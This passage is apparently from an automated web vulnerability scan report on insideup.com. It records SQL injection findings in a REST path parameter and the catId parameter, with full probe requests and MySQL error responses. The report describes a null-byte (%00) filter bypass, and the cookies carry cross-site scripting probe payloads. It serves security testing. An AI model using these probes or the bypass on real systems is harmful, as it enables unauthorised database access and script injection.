OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:33:02 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=jniu9okjhrvhi0rouvqoc87ib4; path=/
Content-Length: 2486
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
leadflow/cace00'/project_dynamic_page_updated.php?catId=80007&group=cace00&template=3' OR prj.project_page_url = 'leadflow/cace00'/project_dynamic_page_updated.php?catId=80007&group=cace00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=80007&group=cace00&template=3' OR prj.project_page_url = 'leadflow/cace00' at line 5

Request 2

GET /ppc/leadflow/cace00''/project_dynamic_page_updated.php?catId=80007&group=cace00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:33:03 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=jp970l4176sdj5qdfj5rfc83e5; path=/
Content-Length: 129
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/cace00''/project_dynamic_page_updated.php was not found on this server.</p>

1.203. http://www.insideup.com/ppc/leadflow/cace00/project_dynamic_page_updated.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project_dynamic_page_updated.php

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/cace00/project_dynamic_page_updated.php'?catId=80007&group=cace00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:33:14 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=g79ble15tas688uiv5psfolah0; path=/
Content-Length: 2486
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
leadflow/cace00/project_dynamic_page_updated.php'?catId=80007&group=cace00&template=3' OR prj.project_page_url = 'leadflow/cace00/project_dynamic_page_updated.php'?catId=80007&group=cace00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=80007&group=cace00&template=3' OR prj.project_page_url = 'leadflow/cace00' at line 5

Request 2

GET /ppc/leadflow/cace00/project_dynamic_page_updated.php''?catId=80007&group=cace00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:33:14 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=hu4v5eo6r6cojoons588v6fo17; path=/
Content-Length: 129
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/cace00/project_dynamic_page_updated.php'' was not found on this server.</p>

1.204. http://www.insideup.com/ppc/leadflow/cace00/project_dynamic_page_updated.php [catId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project_dynamic_page_updated.php

Issue detail

The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /ppc/leadflow/cace00/project_dynamic_page_updated.php?catId=80007%00'&group=cace00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
